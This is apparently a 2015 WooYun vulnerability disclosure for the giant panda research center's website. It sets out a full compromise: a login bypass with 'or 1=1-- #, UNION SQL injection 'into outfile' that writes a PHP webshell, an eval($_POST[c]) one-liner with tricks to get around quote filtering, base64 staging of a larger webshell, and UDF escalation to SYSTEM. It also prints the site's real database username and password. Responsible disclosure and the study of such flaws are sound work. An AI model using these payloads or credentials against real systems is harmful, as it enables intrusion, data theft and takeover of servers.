当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149475

漏洞标题:中国保护大熊猫研究中心首页存在SQL注入漏洞/后台登入绕过/物理路径泄露漏洞可Getshell

相关厂商:中国保护大熊猫研究中心

漏洞作者: 我在不想理你

提交时间:2015-10-26 10:03

修复时间:2015-12-14 16:08

公开时间:2015-12-14 16:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开

简要描述:

中国保护大熊猫研究中心中文、日语、英语三个网站首页均存在后台登录绕过,以及物理路径泄露,和sql注入漏洞,但网站过滤引号字符,需要使用小技巧绕过防御,详情看描述

详细说明:

http://**.**.**.**/bugs/wooyun-2010-0149063/trace/40ed46c3b88cb092d7c80e7389daa673
中国保护大熊猫研究中心首页存在SQL注入漏洞/后台登入绕过/物理路径泄露漏洞可Getshell
中国保护大熊猫研究中心中文、日语、英语三个网站首页均存在后台登录绕过,以及物理路径泄露,和sql注入漏洞,但网站过滤引号字符,需要使用小技巧绕过防御,详情看描述
1.后台登录绕过
在网站首页最底下,有一个管理页面点击进去,存在万能密码sql注入绕过
http://**.**.**.**/index.php
账号:'or 1=1-- #

登录.PNG


2.后台存在上传页面,尝试上传php大马,爆出物理路径

上传.PNG


物理路径.PNG


3.blog.php页面存在sql注入
http://**.**.**.**/blog.php?id=1506

sql.PNG


http://**.**.**.**/blog.php?id=1506 order by 12-- # 出错情况如下

sql12.PNG


http://**.**.**.**/blog.php?id=1506 order by 11-- # 出错情况如下

sql11.PNG


http://**.**.**.**/blog.php?id=1506 order by 1-- # 出错情况如下

sql4.PNG


由此 我们可以发现,这里其实一共有三个sql语句查询
order by 12出错在第一个sql查询
order by 11出错在第二个sql查询
order by 1出错在第三个sql查询updata
我们可以利用order by 11 使得第一个查询成功 但是没有回显结果 因为第二个sql查询出错挡住了结果
故验证正确
执行了但没回显

success.PNG


利用物理路径写入一句话
http://**.**.**.**/blog.php?id=1506 and 1=2 union select 1,2,一句话hex,4,5,6,7,8,9,10,11 into outfile 'D://panda//panda//1.txt' -- #

shell.PNG


4.绕过防御
写入一句话eval($_POST[c]),但是菜刀并连不上去,因为输入过滤了引号

exec.PNG


利用多参数传递,绕过引号

whoami.PNG


然后想如何写入大马提权呢,直接base64编码绕过防御后在解密落地吧

base64.PNG


写入大马,查看配置
$dbservertype='mysql';
$servername='localhost';
$dbusername='PANDA';
$dbpassword='pandaeyes123';
查看mysql数据库,发现root密码跟PANDA密码md5一样,直接UDF提权
附system权限图

system.PNG


漏洞证明:

详情见详细说明

system.PNG

修复方案:

修复后台登入sql绕过,修复blog.php页面sql注入问题,更换物理路径

版权声明:转载请注明来源 我在不想理你@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-10-30 16:07

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无


漏洞评价:

评价

  1. 2015-10-31 08:44 | 我在不想理你 ( 路人 | Rank:22 漏洞数:10 | 人生路漫漫)

    getshell了,才给4个rank